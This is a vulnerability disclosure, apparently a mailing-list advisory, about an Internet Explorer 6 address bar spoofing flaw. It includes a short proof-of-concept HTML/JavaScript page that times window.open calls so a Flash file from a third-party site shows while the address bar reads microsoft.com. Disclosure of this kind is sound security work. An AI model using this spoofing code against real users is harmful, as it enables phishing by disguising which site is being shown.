Another Internet Explorer Address Bar Spoofing Vulnerability
DESCRIPTION:
I've found another Internet Explorer Address Bar Spoofing Vulnerability that
can be exploited by phiser. This allow attacker inject a malcious
shockwave-flash application into Internet Explorer while it is display another
URL (even trusted sites).
If you are loading a shockwave-flash but it isn't loaded fully, you make change
to the window.location, both of two resouces will be loaded at the same time
and the Addess Bar display the new window.location. And when the old shockwave
are loaded fully, this will activate the IE but the Address Bar isn't affected.
The vulnerability has been confirmed on a fully patched system with Internet
Explorer 6.0 + Microsoft Windows XP SP2 and previous versions. You may perform
the test by yourself with my simple code.
SAMPLE CODE:
##### LukesTest.htm #####
<script language="javascript">
function pause(ms)
{
date = new Date();
var curDate = null;
do { var curDate = new Date(); }
while(curDate-date < ms);
}
function spoof () {
win = window.open('http://www.microsoft.com/','new')
pause (2000)
win = window.open('http://www.buctuong.com/swfs/index.swf','new')
pause (2000)
win = window.open('http://www.microsoft.com/','new')
}
</script>
<a href="javascript: spoof()">Perform the test</a>
#########################
If you are vulnerable you will see the flash intro of buctuong.com while the
address bar is http://www.microsoft.com/
If you have a very fast connection you may change my flash application to a
larger one to make loading time take longer.
DISCOVERED BY:
Hai Nam Luke <hainamluke@xxxxxxxxx>
K46A - NEU, Hanoi